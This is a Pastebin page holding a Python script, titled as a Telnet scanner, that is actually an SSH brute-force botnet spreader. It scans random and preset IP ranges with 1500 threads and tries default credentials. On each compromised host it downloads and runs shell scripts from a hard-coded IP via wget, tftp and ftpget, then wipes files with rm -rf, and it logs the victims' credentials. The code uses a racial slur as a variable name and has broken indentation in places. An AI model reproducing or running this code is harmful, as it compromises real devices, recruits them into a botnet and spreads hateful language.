API tools faq
paste
Advertisement
ThaRealUDP

Zeus.py Telnet Scanner (Semi Public Refreshed)

ThaRealUDP
Oct 18th, 2016
275
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.61 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python
  2. import threading, paramiko, random, socket, time, sys
  3.  
  4. paramiko.util.log_to_file("/dev/null")
  5.  
  6. #cmd='cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.167.138.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 198.167.138.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.167.138.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.167.138.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
  7. cmd='cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://198.167.138.154/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 198.167.138.154 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 198.167.138.154; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 198.167.138.154 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *'
  8. blacklist = [
  9.     '127'
  10. ]
  11.  
  12. passwords = [
  13.     "admin:admin"
  14. ]
  15.  
  16. if sys.argv[4] == '1':
  17.      passwords = ["root:root"]
  18. if sys.argv[4] == '2':
  19.      passwords = ["guest:guest"]
  20. if sys.argv[4] == '3':
  21.      passwords = ["admin:1234"]
  22. if sys.argv[4] == '4':
  23.      passwords = ["admin:admin"]
  24.  
  25. print "\x1b[0;31mScanner Started...\x1b[0m"
  26.  
  27. ipclassinfo = sys.argv[2]
  28. if ipclassinfo == "A":
  29.     ip1 = sys.argv[3]
  30. elif ipclassinfo == "B":
  31.     ip1 = sys.argv[3].split(".")[0]
  32.     ip2 = sys.argv[3].split(".")[1]
  33. elif ipclassinfo == "C":
  34.     ips = sys.argv[3].split(".")
  35.     num=0
  36.     for ip in ips:
  37.         num=num+1
  38.         if num == 1:
  39.             ip1 = ip
  40.         elif num == 2:
  41.             ip2 = ip
  42.         elif num == 3:
  43.             ip3 = ip
  44. class sshscanner(threading.Thread):
  45.     global passwords
  46.     global ipclassinfo
  47.     if ipclassinfo == "A":
  48.         global ip1
  49.     elif ipclassinfo == "B":
  50.         global ip1
  51.         global ip2
  52.     elif ipclassinfo == "C":
  53.         global ip1
  54.         global ip2
  55.         global ip3
  56.     def run(self):
  57.         while 1:
  58.             try:
  59.                 while 1:
  60.                     thisipisbad='no'
  61.                     if ipclassinfo == "A":
  62.                         self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  63.                     elif ipclassinfo == "B":
  64.                         self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  65.                     elif ipclassinfo == "C":
  66.                         self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
  67.                     elif ipclassinfo == "BRAZIL":
  68.                         br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
  69.                         self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  70.                     elif ipclassinfo == "ER":
  71.                         yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
  72.                         self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  73.                     elif ipclassinfo == "LUCKY":
  74.                         lucky = ["125.27","101.109","113.53","118.173","122.170","122.180","46.62","5.78","101.108","1.20","125.25","125.26","182.52","118.172","118.174","118.175","125.24"]
  75.                         self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  76.                     elif ipclassinfo == "LUCKY2":
  77.                         lucky2 = [ "122.3","122.52","122.54","119.93","124.105","124.105" ]
  78.             self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  79.             elif ipclassinfo == "LUCKY3":
  80.                         lucky2 = [ "103.20","103.30","103.47","103.57" ]
  81.             self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  82.                     elif ipclassinfo == "RAND":
  83.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  84.                     elif ipclassinfo == "INTERNET":
  85.                         lol = ["1"]
  86.                         self.host = random.choice(lol)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  87.                     else:
  88.                         self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
  89.                     for badip in blacklist:
  90.                         if badip in self.host:
  91.                             thisipisbad='yes'
  92.                     if thisipisbad=='no':
  93.                         break
  94.                 username='root'
  95.                 password=""
  96.                 port = 22
  97.                 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  98.                 s.settimeout(3)
  99.                 s.connect((self.host, port))
  100.                 s.close()
  101.                 ssh = paramiko.SSHClient()
  102.                 ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  103.                 dobreak=False
  104.                 for passwd in passwords:
  105.                     if ":n/a" in passwd:
  106.                         password=""
  107.                     else:
  108.                         password=passwd.split(":")[1]
  109.                     if "n/a:" in passwd:
  110.                         username=""
  111.                     else:
  112.                         username=passwd.split(":")[0]
  113.                     try:
  114.                         ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
  115.                         dobreak=True
  116.                         break
  117.                     except:
  118.                         pass
  119.                     if True == dobreak:
  120.                         break
  121.                 badserver=True
  122.                 stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
  123.                 output = stdout.read()
  124.                 if "inet addr" in output:
  125.                     badserver=False
  126.                 if badserver == False:
  127.                         print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
  128.             ssh.exec_command(""+cmd+"")
  129.             nigger = open("vuln.txt", "a").write(username + ":" + password + ":" + self.host + "\n")
  130.                         time.sleep(15)
  131.                         ssh.close()
  132.             except:
  133.                 pass
  134.  
  135. for x in range(0,1500):
  136.     try:
  137.         t = sshscanner()
  138.         t.start()
  139.     except:
  140.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!